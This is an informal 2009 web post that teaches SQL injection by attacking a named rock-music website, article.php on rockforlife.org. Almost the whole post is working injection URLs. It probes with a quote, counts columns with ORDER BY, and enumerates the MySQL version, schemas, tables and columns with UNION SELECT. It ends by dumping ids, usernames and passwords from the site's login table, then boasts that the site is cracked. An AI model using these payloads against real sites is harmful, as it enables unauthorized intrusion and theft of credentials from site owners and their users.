SQL Injection
iSpeech.org
today i will be showing you how to hack a website using SQL injection
the site we will be hacking today is a rock site lets see shall we :
http://www.rockforlife.org/article.php?id=10253
now lets see if this is vuln. to SQL injection so we add a ' at the end like this :
http://www.rockforlife.org/article.php?id=10253'
if you see this sql error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
that means yes it is vuln. to sql now we can go to the next step
we need to see how many coulmns this page has so we do this :
http://www.rockforlife.org/article.php?id=10253 order by 1
now we keep changing the number until we get an error so lets try a few :
http://www.rockforlife.org/article.php?id=10253 order by 10 no error
http://www.rockforlife.org/article.php?id=10253 order by 15 yes it gave an error it gave us this error :
Unknown column '15' in 'order clause'
this means the page has 14 coulmns now we can move on
now we want to select all the coulmns to see which coulmn is vuln. to SQL like this:
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
now you should see some number(s) on the page in our case we got 2 and 5 this mean coulmn 2 and coulmn 5 are vuln. to sql
so now lets see which version this site uses for mysql and since we have two vuln. coulmns we can use anyone of them
i will use coulmn number 2 like this :
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14--
the @@version lets us see what version the mysql is and since coulmn number 2 is vuln. we can inject sql commands through it
so now lets go to the next step :
now mysql 5 has the information schema and that saves us alot of work cuz in version 4 we had to search for the coulmns and other stuff
while in version 5 the information schema tells us everything that we need so we inject this code to the site to see all the database(s)
that the site has :
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.schemata
as you can see we got all of the databases lets continue :
now we want the main database and its tables so we do this :
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
yaaay you see all that ? 😛 all we need is the table that is called login =D so we do this :
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=login
and this will give us an error have no worries all we need to do is hex the table name like so :
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=char(108,111,103,105,110)
and BAAAM!!! you see that baby ?!!
so now we want the id,user,pass,user_id and password so lets get them shall we ? like this :
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14 from login
Congratz site h4x3d and cracked WHO SAID YOU CANT KILL ROCK ?!?! we just did 😉
2009-05-14 01:32:04
source
Gloss